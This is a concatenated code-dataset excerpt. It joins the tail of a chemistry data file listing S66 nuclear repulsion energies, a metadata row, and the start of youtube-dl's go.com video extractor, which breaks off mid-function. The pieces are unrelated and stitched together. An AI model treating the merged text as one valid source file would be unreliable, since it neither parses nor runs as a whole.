DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoA-unCP' ] = 357.25263911
DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoB-unCP' ] = 357.22824169
DATA['NUCLEAR REPULSION ENERGY']['S66-18-dimer' ] = 269.39653929
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoA-unCP' ] = 9.12915636
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoB-unCP' ] = 206.28546361
DATA['NUCLEAR REPULSION ENERGY']['S66-19-dimer' ] = 337.49486033
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoA-unCP' ] = 40.42190801
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoB-unCP' ] = 206.28426737
DATA['NUCLEAR REPULSION ENERGY']['S66-20-dimer' ] = 381.47467603
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoA-unCP' ] = 121.35354216
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoB-unCP' ] = 121.35037507
DATA['NUCLEAR REPULSION ENERGY']['S66-21-dimer' ] = 373.66110820
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoA-unCP' ] = 121.85534909
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoB-unCP' ] = 121.85562743
DATA['NUCLEAR REPULSION ENERGY']['S66-22-dimer' ] = 685.96293615
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoA-unCP' ] = 121.30606379
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoB-unCP' ] = 357.30242624
DATA['NUCLEAR REPULSION ENERGY']['S66-23-dimer' ] = 682.46450694
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoA-unCP' ] = 121.91206440
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoB-unCP' ] = 357.16987646
DATA['NUCLEAR REPULSION ENERGY']['S66-24-dimer' ] = 623.71187998
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoA-unCP' ] = 203.71200257
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoB-unCP' ] = 203.71172379
DATA['NUCLEAR REPULSION ENERGY']['S66-25-dimer' ] = 637.14156863
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoA-unCP' ] = 206.22564193
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoB-unCP' ] = 206.22748415
DATA['NUCLEAR REPULSION ENERGY']['S66-26-dimer' ] = 1163.54572871
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoA-unCP' ] = 357.16027337
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoB-unCP' ] = 357.16027370
DATA['NUCLEAR REPULSION ENERGY']['S66-27-dimer' ] = 630.67443466
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoA-unCP' ] = 203.68422363
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoB-unCP' ] = 206.25955744
DATA['NUCLEAR REPULSION ENERGY']['S66-28-dimer' ] = 878.32907732
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoA-unCP' ] = 203.65134501
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoB-unCP' ] = 357.16948119
DATA['NUCLEAR REPULSION ENERGY']['S66-29-dimer' ] = 885.28192562
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoA-unCP' ] = 206.16040036
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoB-unCP' ] = 357.23565563
DATA['NUCLEAR REPULSION ENERGY']['S66-30-dimer' ] = 327.62509332
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoA-unCP' ] = 203.74228045
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoB-unCP' ] = 33.43000301
DATA['NUCLEAR REPULSION ENERGY']['S66-31-dimer' ] = 518.26358403
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoA-unCP' ] = 357.18726739
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoB-unCP' ] = 33.40409180
DATA['NUCLEAR REPULSION ENERGY']['S66-32-dimer' ] = 495.33117294
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoA-unCP' ] = 357.24995067
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoB-unCP' ] = 24.63459975
DATA['NUCLEAR REPULSION ENERGY']['S66-33-dimer' ] = 332.11307535
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoA-unCP' ] = 206.29228895
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoB-unCP' ] = 33.42391806
DATA['NUCLEAR REPULSION ENERGY']['S66-34-dimer' ] = 577.94330068
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoA-unCP' ] = 185.63664994
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoB-unCP' ] = 185.63558546
DATA['NUCLEAR REPULSION ENERGY']['S66-35-dimer' ] = 574.13141612
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoA-unCP' ] = 185.63471242
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoB-unCP' ] = 199.36895747
DATA['NUCLEAR REPULSION ENERGY']['S66-36-dimer' ] = 573.01241887
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoA-unCP' ] = 199.35493735
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoB-unCP' ] = 199.35496470
DATA['NUCLEAR REPULSION ENERGY']['S66-37-dimer' ] = 569.42803611
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoA-unCP' ] = 188.28929834
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoB-unCP' ] = 199.34481507
DATA['NUCLEAR REPULSION ENERGY']['S66-38-dimer' ] = 562.36494675
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoA-unCP' ] = 188.38358820
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoB-unCP' ] = 188.37865241
DATA['NUCLEAR REPULSION ENERGY']['S66-39-dimer' ] = 594.82529945
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoA-unCP' ] = 203.67735882
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoB-unCP' ] = 188.40454306
DATA['NUCLEAR REPULSION ENERGY']['S66-40-dimer' ] = 598.08168004
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoA-unCP' ] = 203.68538784
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoB-unCP' ] = 199.37329650
DATA['NUCLEAR REPULSION ENERGY']['S66-41-dimer' ] = 843.32242800
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoA-unCP' ] = 357.06617642
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoB-unCP' ] = 185.61673585
DATA['NUCLEAR REPULSION ENERGY']['S66-42-dimer' ] = 830.51659591
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoA-unCP' ] = 357.04169352
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoB-unCP' ] = 188.33728572
DATA['NUCLEAR REPULSION ENERGY']['S66-43-dimer' ] = 830.36688604
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoA-unCP' ] = 357.12713115
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoB-unCP' ] = 199.36153551
DATA['NUCLEAR REPULSION ENERGY']['S66-44-dimer' ] = 303.64951312
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoA-unCP' ] = 33.42556566
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoB-unCP' ] = 185.65594848
DATA['NUCLEAR REPULSION ENERGY']['S66-45-dimer' ] = 285.69697355
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoA-unCP' ] = 24.64923587
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoB-unCP' ] = 185.73197134
DATA['NUCLEAR REPULSION ENERGY']['S66-46-dimer' ] = 576.36980953
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoA-unCP' ] = 180.49044991
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoB-unCP' ] = 185.67687994
DATA['NUCLEAR REPULSION ENERGY']['S66-47-dimer' ] = 592.90348525
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoA-unCP' ] = 203.66921988
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoB-unCP' ] = 203.67694204
DATA['NUCLEAR REPULSION ENERGY']['S66-48-dimer' ] = 601.34387795
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoA-unCP' ] = 206.19608668
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoB-unCP' ] = 206.19869697
DATA['NUCLEAR REPULSION ENERGY']['S66-49-dimer' ] = 596.54644729
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoA-unCP' ] = 203.65045916
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoB-unCP' ] = 206.22459403
DATA['NUCLEAR REPULSION ENERGY']['S66-50-dimer' ] = 300.96547874
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoA-unCP' ] = 203.65156163
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoB-unCP' ] = 24.63554547
DATA['NUCLEAR REPULSION ENERGY']['S66-51-dimer' ] = 73.51391626
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoA-unCP' ] = 24.65072244
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoB-unCP' ] = 24.64312912
DATA['NUCLEAR REPULSION ENERGY']['S66-52-dimer' ] = 488.72204285
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoA-unCP' ] = 203.60587521
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoB-unCP' ] = 121.22680816
DATA['NUCLEAR REPULSION ENERGY']['S66-53-dimer' ] = 475.54833273
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoA-unCP' ] = 203.61290966
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoB-unCP' ] = 121.83743933
DATA['NUCLEAR REPULSION ENERGY']['S66-54-dimer' ] = 274.02041197
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoA-unCP' ] = 203.63390042
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoB-unCP' ] = 9.16766818
DATA['NUCLEAR REPULSION ENERGY']['S66-55-dimer' ] = 349.34385129
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoA-unCP' ] = 203.62143957
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoB-unCP' ] = 40.41522246
DATA['NUCLEAR REPULSION ENERGY']['S66-56-dimer' ] = 347.25412940
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoA-unCP' ] = 203.65859480
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoB-unCP' ] = 42.10725315
DATA['NUCLEAR REPULSION ENERGY']['S66-57-dimer' ] = 584.88796485
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoA-unCP' ] = 203.60060155
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoB-unCP' ] = 180.55180987
DATA['NUCLEAR REPULSION ENERGY']['S66-58-dimer' ] = 577.23538658
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoA-unCP' ] = 206.16864626
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoB-unCP' ] = 206.16860003
DATA['NUCLEAR REPULSION ENERGY']['S66-59-dimer' ] = 53.29797952
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoA-unCP' ] = 24.62604423
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoB-unCP' ] = 9.17684034
DATA['NUCLEAR REPULSION ENERGY']['S66-60-dimer' ] = 206.60195669
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoA-unCP' ] = 24.62574637
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoB-unCP' ] = 121.22795347
DATA['NUCLEAR REPULSION ENERGY']['S66-61-dimer' ] = 475.00612950
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoA-unCP' ] = 185.62492607
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoB-unCP' ] = 121.23972648
DATA['NUCLEAR REPULSION ENERGY']['S66-62-dimer' ] = 478.48168724
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoA-unCP' ] = 185.65184859
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoB-unCP' ] = 121.86597939
DATA['NUCLEAR REPULSION ENERGY']['S66-63-dimer' ] = 496.78090588
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoA-unCP' ] = 203.66095658
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoB-unCP' ] = 121.23566219
DATA['NUCLEAR REPULSION ENERGY']['S66-64-dimer' ] = 300.38789564
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoA-unCP' ] = 180.56185111
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoB-unCP' ] = 33.41895147
DATA['NUCLEAR REPULSION ENERGY']['S66-65-dimer' ] = 292.14525417
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoA-unCP' ] = 206.26607138
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoB-unCP' ] = 24.59915901
DATA['NUCLEAR REPULSION ENERGY']['S66-66-dimer' ] = 349.09867633
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoA-unCP' ] = 42.09376472
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoB-unCP' ] = 206.23491680
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoA-CP' ] = 9.15671411
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoB-CP' ] = 9.17259114
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoA-CP' ] = 9.14996836
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoB-CP' ] = 40.29463192
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoA-CP' ] = 9.12565570
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoB-CP' ] = 42.06267577
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoA-CP' ] = 9.13184124
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoB-CP' ] = 180.56084030
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoA-CP' ] = 40.41731272
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoB-CP' ] = 40.29806380
DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoA-CP' ] = 40.42467073
DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoB-CP' ] = 42.05202847
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoA-CP' ] = 40.41876218
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoB-CP' ] = 180.73873695
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoA-CP' ] = 40.42326344
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoB-CP' ] = 9.17236900
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoA-CP' ] = 42.10593235
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoB-CP' ] = 40.34710761
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoA-CP' ] = 42.09217552
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoB-CP' ] = 42.05982938
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoA-CP' ] = 42.09328618
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoB-CP' ] = 180.72211450
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoA-CP' ] = 42.04336531
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoB-CP' ] = 9.12312499
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoA-CP' ] = 180.80545988
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoB-CP' ] = 40.30378877
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoA-CP' ] = 180.81499576
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoB-CP' ] = 42.03791353
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoA-CP' ] = 180.53794513
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoB-CP' ] = 180.54327910
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoA-CP' ] = 180.57089645
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoB-CP' ] = 9.17374713
DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoA-CP' ] = 357.25263911
DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoB-CP' ] = 357.22824169
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoA-CP' ] = 9.12915636
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoB-CP' ] = 206.28546361
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoA-CP' ] = 40.42190801
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoB-CP' ] = 206.28426737
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoA-CP' ] = 121.35354216
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoB-CP' ] = 121.35037507
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoA-CP' ] = 121.85534909
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoB-CP' ] = 121.85562743
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoA-CP' ] = 121.30606379
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoB-CP' ] = 357.30242624
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoA-CP' ] = 121.91206440
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoB-CP' ] = 357.16987646
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoA-CP' ] = 203.71200257
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoB-CP' ] = 203.71172379
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoA-CP' ] = 206.22564193
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoB-CP' ] = 206.22748415
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoA-CP' ] = 357.16027337
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoB-CP' ] = 357.16027370
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoA-CP' ] = 203.68422363
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoB-CP' ] = 206.25955744
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoA-CP' ] = 203.65134501
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoB-CP' ] = 357.16948119
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoA-CP' ] = 206.16040036
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoB-CP' ] = 357.23565563
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoA-CP' ] = 203.74228045
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoB-CP' ] = 33.43000301
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoA-CP' ] = 357.18726739
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoB-CP' ] = 33.40409180
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoA-CP' ] = 357.24995067
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoB-CP' ] = 24.63459975
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoA-CP' ] = 206.29228895
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoB-CP' ] = 33.42391806
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoA-CP' ] = 185.63664994
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoB-CP' ] = 185.63558546
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoA-CP' ] = 185.63471242
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoB-CP' ] = 199.36895747
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoA-CP' ] = 199.35493735
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoB-CP' ] = 199.35496470
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoA-CP' ] = 188.28929834
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoB-CP' ] = 199.34481507
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoA-CP' ] = 188.38358820
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoB-CP' ] = 188.37865241
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoA-CP' ] = 203.67735882
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoB-CP' ] = 188.40454306
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoA-CP' ] = 203.68538784
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoB-CP' ] = 199.37329650
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoA-CP' ] = 357.06617642
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoB-CP' ] = 185.61673585
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoA-CP' ] = 357.04169352
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoB-CP' ] = 188.33728572
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoA-CP' ] = 357.12713115
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoB-CP' ] = 199.36153551
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoA-CP' ] = 33.42556566
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoB-CP' ] = 185.65594848
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoA-CP' ] = 24.64923587
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoB-CP' ] = 185.73197134
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoA-CP' ] = 180.49044991
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoB-CP' ] = 185.67687994
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoA-CP' ] = 203.66921988
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoB-CP' ] = 203.67694204
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoA-CP' ] = 206.19608668
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoB-CP' ] = 206.19869697
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoA-CP' ] = 203.65045916
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoB-CP' ] = 206.22459403
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoA-CP' ] = 203.65156163
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoB-CP' ] = 24.63554547
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoA-CP' ] = 24.65072244
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoB-CP' ] = 24.64312912
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoA-CP' ] = 203.60587521
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoB-CP' ] = 121.22680816
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoA-CP' ] = 203.61290966
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoB-CP' ] = 121.83743933
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoA-CP' ] = 203.63390042
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoB-CP' ] = 9.16766818
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoA-CP' ] = 203.62143957
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoB-CP' ] = 40.41522246
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoA-CP' ] = 203.65859480
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoB-CP' ] = 42.10725315
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoA-CP' ] = 203.60060155
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoB-CP' ] = 180.55180987
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoA-CP' ] = 206.16864626
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoB-CP' ] = 206.16860003
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoA-CP' ] = 24.62604423
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoB-CP' ] = 9.17684034
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoA-CP' ] = 24.62574637
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoB-CP' ] = 121.22795347
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoA-CP' ] = 185.62492607
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoB-CP' ] = 121.23972648
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoA-CP' ] = 185.65184859
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoB-CP' ] = 121.86597939
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoA-CP' ] = 203.66095658
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoB-CP' ] = 121.23566219
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoA-CP' ] = 180.56185111
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoB-CP' ] = 33.41895147
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoA-CP' ] = 206.26607138
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoB-CP' ] = 24.59915901
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoA-CP' ] = 42.09376472
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoB-CP' ] = 206.23491680
|
lgpl-3.0
| 3,411,172,288,187,390,000
| 54.537799
| 116
| 0.516459
| false
| 2.519645
| false
| false
| false
|
jonyroda97/redbot-amigosprovaveis
|
lib/youtube_dl/extractor/go.py
|
1
|
9185
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:(?:[^/]+/)*(?P<id>vdka\w+)|(?:[^/]+/)*(?P<display_id>[^/?#]+))'\
% '|'.join(list(_SITE_INFO.keys()) + ['disneynow'])
_TESTS = [{
'url': 'http://abc.go.com/shows/designated-survivor/video/most-recent/VDKA3807643',
'info_dict': {
'id': 'VDKA3807643',
'ext': 'mp4',
'title': 'The Traitor in the White House',
'description': 'md5:05b009d2d145a1e85d25111bd37222e8',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://watchdisneyxd.go.com/doraemon',
'info_dict': {
'title': 'Doraemon',
'id': 'SH55574025',
},
'playlist_mincount': 51,
}, {
'url': 'http://abc.go.com/shows/the-catch/episode-guide/season-01/10-the-wedding',
'only_matching': True,
}, {
'url': 'http://abc.go.com/shows/world-news-tonight/episode-guide/2017-02/17-021717-intense-stand-off-between-man-with-rifle-and-police-in-oakland',
'only_matching': True,
}, {
# brand 004
'url': 'http://disneynow.go.com/shows/big-hero-6-the-series/season-01/episode-10-mr-sparkles-loses-his-sparkle/vdka4637915',
'only_matching': True,
}, {
# brand 008
'url': 'http://disneynow.go.com/shows/minnies-bow-toons/video/happy-campers/vdka4872013',
'only_matching': True,
}]
def _extract_videos(self, brand, video_id='-1', show_id='-1'):
display_id = video_id if video_id != '-1' else show_id
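        # '-1' appears to act as a wildcard for the watchabc API: with only
        # show_id set this returns every video of a show, while with only
        # video_id set it returns a single-element list (hence the [0] in
        # _real_extract below).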
return self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/%s/-1/%s/-1/-1.json' % (brand, show_id, video_id),
display_id)['video']
def _real_extract(self, url):
sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
site_info = self._SITE_INFO.get(sub_domain, {})
brand = site_info.get('brand')
if not video_id or not site_info:
webpage = self._download_webpage(url, display_id or video_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=["\']*(VDKA\w+)', webpage, 'video id',
default=None)
if not site_info:
brand = self._search_regex(
(r'data-brand=\s*["\']\s*(\d+)',
r'data-page-brand=\s*["\']\s*(\d+)'), webpage, 'brand',
default='004')
site_info = next(
si for _, si in self._SITE_INFO.items()
if si.get('brand') == brand)
if not video_id:
# show extraction works for Disney, DisneyJunior and DisneyXD
                # ABC and Freeform have a different layout
show_id = self._search_regex(r'data-show-id=["\']*(SH\d+)', webpage, 'show id')
videos = self._extract_videos(brand, show_id=show_id)
show_title = self._search_regex(r'data-show-title="([^"]+)"', webpage, 'show title', fatal=False)
entries = []
for video in videos:
entries.append(self.url_result(
video['url'], 'Go', video.get('id'), video.get('title')))
entries.reverse()
return self.playlist_result(entries, show_id, show_title)
video_data = self._extract_videos(brand, video_id)[0]
video_id = video_data['id']
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
else:
self._initialize_geo_bypass({'countries': ['US']})
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data))
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
for error in errors:
if error.get('code') == 1002:
self.raise_geo_restricted(
error['message'], countries=['US'])
